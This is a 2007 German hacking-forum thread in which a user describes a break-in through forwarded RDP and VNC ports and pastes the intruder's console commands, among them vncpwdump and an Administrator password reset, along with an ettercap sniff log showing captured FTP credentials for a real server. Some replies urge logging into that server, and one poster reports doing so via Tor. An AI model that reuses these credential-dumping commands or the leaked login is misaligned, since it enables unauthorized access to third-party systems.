[HaBo]

ulbed · 16.06.07, 07:10

erstmal ein hallo an alle! ich wurde von einem anderen forum aus in dieses überwiesen. Ich kanns nicht fassen! Ich bin ein sehr vorsichtiger Mensch und sichere mich immer mehrfach ab. Installiere immer die neusten Updates und Fixes und alles was halt dazu gehört! Doch jetzt hat es mich erwischt! Einmal nicht aufgepasst (remotedesktop und winvnc port waren durchgeroutet) und schon ist mein Pc gehackt worden!
Binnen einer Stunde hat mir jemand um die 50 Programme draufgeladen (hauptsächlich cygwin + addons), sämtliche persönliche Dateien durchwühlt und passwörter gesnifft und gedumped was das Zeug hält. Anschließend vermutlich die Dateien mit Aladdin Systems Stuffit Deluxe komprimiert, verschlüsselt und sich heruntergeladen....
Bemerkt habe ich es als seltsamerweise die commandline shell offen war und ich dort eines meiner passwörter entziffern konnte! Windowslogs hat er schön gesäubert und nun tappe ich im Dunkeln. Weiß nicht was er hat und was nicht.
Den PC musste er scheinbar neustarten woraus ich schließe dass er nur auf eine von 3 Platten konnte da die anderen mit drivecrypt gesichert waren. Die Firewall hat auch nichts Deutliches zu sagen, zwar viele Verbindungen aber leider so viele Fakeconnections und ständig andere ips sodass ich keine Ahnung habe welche die richtige ist. Die eine Holland, die andere Albanien und und und..... wahrscheinlich hatte er ein paar proxies.
Hat vielleicht erstmal jemand eine Idee wie ich herausfinden kann zu welchen Dateien er zugegriffen hat? Bin so verärgert dass mir der Kopf gleich platzt aaaaaahhh

also erstmal was noch in der commandline zu sehen war:

Code:

 Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:Dokumente und Einstellungen****>fsnd
84.147.213.228
.h/84.147.213.228-16-06-004423.log
0
0=GOOD 1006
^C
C:Dokumente und Einstellungen****>netstat -an

Aktive Verbindungen

Proto Lokale Adresse Remoteadresse Status
TCP 0.0.0.0:135 0.0.0.0:0 ABHÖREN
TCP 0.0.0.0:445 0.0.0.0:0 ABHÖREN
TCP 0.0.0.0:2080 0.0.0.0:0 ABHÖREN
TCP 0.0.0.0:3389 0.0.0.0:0 ABHÖREN
TCP 0.0.0.0:5800 0.0.0.0:0 ABHÖREN
TCP 0.0.0.0:5900 0.0.0.0:0 ABHÖREN
TCP 0.0.0.0:27000 0.0.0.0:0 ABHÖREN
TCP 127.0.0.1:21 0.0.0.0:0 ABHÖREN
TCP 127.0.0.1:8021 0.0.0.0:0 ABHÖREN
TCP 192.168.2.11:21 0.0.0.0:0 ABHÖREN
TCP 192.168.2.11:139 0.0.0.0:0 ABHÖREN
TCP 192.168.2.11:5900 213.149.101.4:47715 HERGESTELLT
TCP 192.168.2.11:8021 0.0.0.0:0 ABHÖREN
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:1025 *:*
UDP 0.0.0.0:1038 *:*
UDP 0.0.0.0:1040 *:*
UDP 0.0.0.0:1371 *:*
UDP 0.0.0.0:1372 *:*
UDP 0.0.0.0:4500 *:*
UDP 127.0.0.1:123 *:*
UDP 127.0.0.1:1041 *:*
UDP 127.0.0.1:1900 *:*
UDP 192.168.2.11:123 *:*
UDP 192.168.2.11:137 *:*
UDP 192.168.2.11:138 *:*
UDP 192.168.2.11:1900 *:*

C:Dokumente und Einstellungen****>ipconfig

Windows-IP-Konfiguration


Ethernetadapter LAN-Verbindung:

Verbindungsspezifisches DNS-Suffix:
IP-Adresse. . . . . . . . . . . . : 192.168.2.11
Subnetzmaske. . . . . . . . . . . : 255.255.255.0
Standardgateway . . . . . . . . . : 192.168.2.1

C:Dokumente und Einstellungen****>cd ..

C:Dokumente und Einstellungen>ls
All Users ******** NetworkService
Default User LocalService ****

C:Dokumente und Einstellungen>vncpwdump -s

VNCPwdump v.1.0.6 by patrik@cqure.net
-------------------------------------
Password: ************

C:Dokumente und Einstellungen>net user Administrator admin
Der Befehl wurde erfolgreich ausgeführt.


C:Dokumente und Einstellungen>

dann hier das log was auf einem ftpserver hochgeladen wurde aber wahrscheinlich der wichtigste teil vom inhalt fehlt:

Code:

 Listening on DeviceNPF_{1A0EC93A-2594-461A-8D20-746D30C707F7}... (Ethernet)

DeviceNPF_{1A0EC93A-2594-461A-8D20-746D30C707F7} -> 00:50:8D:F5:97:EA 192.168.2.11 255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
26 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

FTP : 212.19.163.18:21 -> USER: ACTIS
PASS: ACTIS

FTP : 212.19.163.18:21 -> USER: ACTIS
PASS: ACTIS

FTP : 212.19.163.18:21 -> USER: ACTIS
PASS: ACTIS

FTP : 212.19.163.18:21 -> USER: ACTIS
PASS: ACTIS

FTP : 212.19.163.18:21 -> USER: ACTIS
PASS: ACTIS

FTP : 212.19.163.18:21 -> USER: ACTIS
PASS: ACTIS

FTP : 212.19.163.18:21 -> USER: ACTIS
PASS: ACTIS

FTP : 212.19.163.18:21 -> USER: ACTIS
PASS: ACTIS

FTP : 212.19.163.18:21 -> USER: ACTIS
PASS: ACTIS

FTP : 212.19.163.18:21 -> USER: ACTIS
PASS: ACTIS

und im anhang das trafficlog meiner firewall (sygate personal firewall)

Xalon · 16.06.07, 12:29

Hast dich schon mal auf 212.19.163.18:21 -> USER: ACTIS PASS: ACTIS umgesehen?

Anzeige

- Anzeige -

[starfoxx] · 16.06.07, 12:30

Also, ich stelle wirklich nicht deine Fachkenntnis in Frage, aber, mal grundsätzlich, wer hat interesse daran personal pcs zu hacken? Werd lädt dann dateien runter? Wie kam derjenige an deine Daten usw.?

Das von dir beschriebene Vorgehen schaut etwas zu aufwändig für ein botznetz... ersteller (wie nennt man die Leute die sich botnetze aufbauen?

) aus.

Was willst du machen wenn jemand dermassen eingriff in dein System hatte?
Neu draufmachen und fertig... Was willst du daran noch machen?

Janus · 16.06.07, 12:55

also erstmal, dieser FTP-Server ist französisch...

und da stehen ein paar Sachen mit Lingerie drauf... kA alles unzusammenhängende Sachen, wie ich meine...

Xalon · 16.06.07, 13:57

Zitat:

Original von [starfoxx]
Das von dir beschriebene Vorgehen schaut etwas zu aufwändig für ein botznetz... ersteller (wie nennt man die Leute die sich botnetze aufbauen?

) aus.

Würd sagen BotNetz Admin ;D

Zitat:

Original von [starfoxx]
Was willst du machen wenn jemand dermassen eingriff in dein System hatte?
Neu draufmachen und fertig... Was willst du daran noch machen?

Alle Passwörter ändern

t3rr0r.bYt3 · 16.06.07, 19:39

Zitat:

Original von [starfoxx]
aber, mal grundsätzlich, wer hat interesse daran personal pcs zu hacken?

wir hatten letztens nen fall in #hackerboard im irc, wo ein server seinen ftp announced hat, und das im endeffekt auch nur ein desktop-pc war. die betreffende person wurde informiert, jemand hat ein wenig weitergeforscht und scheinbar ein botnet aufgedeckt.
warum ich mich über details der informationsbeschaffung ausschweige könnt ihr euch vorstellen

thyrael.lu · 16.06.07, 20:50

Das ist ja interessant:

212.19.163.18 -> ftp.maulde.com

Code:

domain:         MAULDE.COM
owner-name:     NETPLUS Communication
owner-address:  198 Avenue de Verdun
owner-address:  France 9213
owner-address:  Issy les Moulineaux
owner-address:  France
admin-c:        NA215-GANDI
tech-c:         NN124-GANDI
bill-c:         NA215-GANDI
nserver:        ns.netplus.fr 212.19.161.34
nserver:        ns2.netplus.fr 212.19.160.129
nserver:        ns3.netplus.fr 212.19.162.67
nserver:        ns4.netplus.fr 212.19.160.229
reg_created:    1999-02-07 00:00:00
expires:        2009-02-07 05:00:00
created:        2002-09-12 03:55:56
changed:        2007-01-26 11:19:23

http://www.maulde.com

weau · 17.06.07, 19:30

Ist denn schon klar, wie der Angriff statt gefunden hat?
Evtl. spielst du ja jetzt wieder Software ein und da ist irgendwo immer noch die Lücke?

pi() · 17.06.07, 19:53

Aaaalso.
Dieser ftp server bzw account gehört dem "hacker", ja?
Wenn dem so ist, und er dort deine Daten hochgeladen hat, dann hast du Glück.
Habs gerade versucht und bin mit genau den Zuagangsdaten (user: ACTIS,passwort:ACTIS)
hineingekommen (natürlich vorsichtshalber mit tor) (allerdings sind da viele französische dateinamen....).Ich würde auf jedenfall schleunigst auf die seite gehen (212.19.163.1

und mir meinen Kram wieder holen, bevor es zu spät ist.

Xalon · 17.06.07, 21:38

SSH läuft auch aufm Server,kann sein das die Userdaten da auch passen

Xalon

17.06.07, 22:04

Auf dem Server liegen lauter Werbe-PDFs & Übungs-Hefte (z.B. Mathe)...

Btw: Kann mir einer sagen, warum das ganze auf französisch sein muss? :-/

ulbed · 18.06.07, 07:34

ich vermute mal dass dieser ftp server ein ebenfalls gehackter server ist den er zum zwischenlagern benutzt hat... in dem ordner in der sich die log befindet (root/.h) sind noch weitere von anderen ips. da steht ein bischen mehr drin. aber so wie es aussieht ist das nur der log von dem ftp server selbst. irgendwelche daten von mir hab ich keine gefunden (da war ich ja schon ein paar stunden nachdem ich den hack bemerkt hab drauf)

nunja das system habe ich jetzt neu aufgesetzt und alle passwörter geändert. das einzige was noch bleibt ist diese trafficlog meiner firewall aber mit den ips ist jetzt wohl nicht mehr viel anzufangen.

wie er es geschafft hat in den pc einzudringen ist mir immernoch unklar. es waren alle bis zu dem zeitpunkt veröffentlichten windows-, firewall-, antivirus-, antirootkit- updates installiert. 3389 tcp und 5900 tcp waren die einzigen ports die geforwarded wurden, wobei der public port für 3389 2011 war. daher kann ich mir das nur durch irgendeinen exploit im rdp oder im vnc protokoll erklären. ersteres würde ich aber erstmal ausschließen da er nicht wissen konnte dass 2011 für rdp war. somit bleibt nur noch die winvnc 4.1.6 enterprise edition als lücke... wobei hier das nicht drinsteht

naked_chef · 18.06.07, 07:50

Zitat:

ersteres würde ich aber erstmal ausschließen da er nicht wissen konnte dass 2011 für rdp war

warum ?
connectest du dich auf den port mit telnet, so wird telnet dir gern erzählrn welcher dienst auf diesem Port läuft, egal wie oft du forwardest

ulbed · 18.06.07, 08:36

ja schon klar nur dann hätte er erstmal einen portscan machen müssen und dann wäre die ip bis auf weiteres gesperrt gewesen

naked_chef · 18.06.07, 08:44

Zitat:

ja schon klar nur dann hätte er erstmal einen portscan machen müssen und dann wäre die ip bis auf weiteres gesperrt gewesen

sagt wer? es gibt scan methoden wo nicht mitgeloggt wird. Stichwort Stealth Scans

Anzeige

- Anzeige -

17.06.07, 19:53	#9 (permalink)
pi() Registriert seit: 29.04.07 Likes: 0	Aaaalso. Dieser ftp server bzw account gehört dem "hacker", ja? Wenn dem so ist, und er dort deine Daten hochgeladen hat, dann hast du Glück. Habs gerade versucht und bin mit genau den Zuagangsdaten (user: ACTIS,passwort:ACTIS) hineingekommen (natürlich vorsichtshalber mit tor) (allerdings sind da viele französische dateinamen....).Ich würde auf jedenfall schleunigst auf die seite gehen (212.19.163.1 und mir meinen Kram wieder holen, bevor es zu spät ist. __________________ Seht euch das bitte einmal an.Hab mir echt Mühe gegeben: Hier: www.gutinmathe.at

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
Steam Acc. hacked - Hilfe	BadBoy52	Games	3	21.01.09 21:00
HACKED BY iSKORPiTX	-Tux-	(In)security allgemein	24	24.07.07 13:52

16.06.07, 12:29	#2 (permalink)
Xalon Registriert seit: 23.05.05 Likes: 0	Hast dich schon mal auf 212.19.163.18:21 -> USER: ACTIS PASS: ACTIS umgesehen?

16.06.07, 12:30	#3 (permalink)
[starfoxx] Senior Member Registriert seit: 18.09.05 Likes: 0	Also, ich stelle wirklich nicht deine Fachkenntnis in Frage, aber, mal grundsätzlich, wer hat interesse daran personal pcs zu hacken? Werd lädt dann dateien runter? Wie kam derjenige an deine Daten usw.? Das von dir beschriebene Vorgehen schaut etwas zu aufwändig für ein botznetz... ersteller (wie nennt man die Leute die sich botnetze aufbauen? ) aus. Was willst du machen wenn jemand dermassen eingriff in dein System hatte? Neu draufmachen und fertig... Was willst du daran noch machen?

16.06.07, 12:55	#4 (permalink)
Janus Registriert seit: 24.01.06 Likes: 0	also erstmal, dieser FTP-Server ist französisch... und da stehen ein paar Sachen mit Lingerie drauf... kA alles unzusammenhängende Sachen, wie ich meine...

17.06.07, 19:30	#8 (permalink)
weau Registriert seit: 21.10.06 Likes: 0	Ist denn schon klar, wie der Angriff statt gefunden hat? Evtl. spielst du ja jetzt wieder Software ein und da ist irgendwo immer noch die Lücke?

17.06.07, 21:38	#10 (permalink)
Xalon Registriert seit: 23.05.05 Likes: 0	SSH läuft auch aufm Server,kann sein das die Userdaten da auch passen Xalon

17.06.07, 22:04	#11 (permalink)
IsNull Guest Likes:	Auf dem Server liegen lauter Werbe-PDFs & Übungs-Hefte (z.B. Mathe)... Btw: Kann mir einer sagen, warum das ganze auf französisch sein muss? :-/

18.06.07, 07:34	#12 (permalink)
ulbed Themenstarter Registriert seit: 16.06.07 Likes: 0	ich vermute mal dass dieser ftp server ein ebenfalls gehackter server ist den er zum zwischenlagern benutzt hat... in dem ordner in der sich die log befindet (root/.h) sind noch weitere von anderen ips. da steht ein bischen mehr drin. aber so wie es aussieht ist das nur der log von dem ftp server selbst. irgendwelche daten von mir hab ich keine gefunden (da war ich ja schon ein paar stunden nachdem ich den hack bemerkt hab drauf) nunja das system habe ich jetzt neu aufgesetzt und alle passwörter geändert. das einzige was noch bleibt ist diese trafficlog meiner firewall aber mit den ips ist jetzt wohl nicht mehr viel anzufangen. wie er es geschafft hat in den pc einzudringen ist mir immernoch unklar. es waren alle bis zu dem zeitpunkt veröffentlichten windows-, firewall-, antivirus-, antirootkit- updates installiert. 3389 tcp und 5900 tcp waren die einzigen ports die geforwarded wurden, wobei der public port für 3389 2011 war. daher kann ich mir das nur durch irgendeinen exploit im rdp oder im vnc protokoll erklären. ersteres würde ich aber erstmal ausschließen da er nicht wissen konnte dass 2011 für rdp war. somit bleibt nur noch die winvnc 4.1.6 enterprise edition als lücke... wobei hier das nicht drinsteht

18.06.07, 08:36	#14 (permalink)
ulbed Themenstarter Registriert seit: 16.06.07 Likes: 0	ja schon klar nur dann hätte er erstmal einen portscan machen müssen und dann wäre die ip bis auf weiteres gesperrt gewesen

[HaBo]

Hacked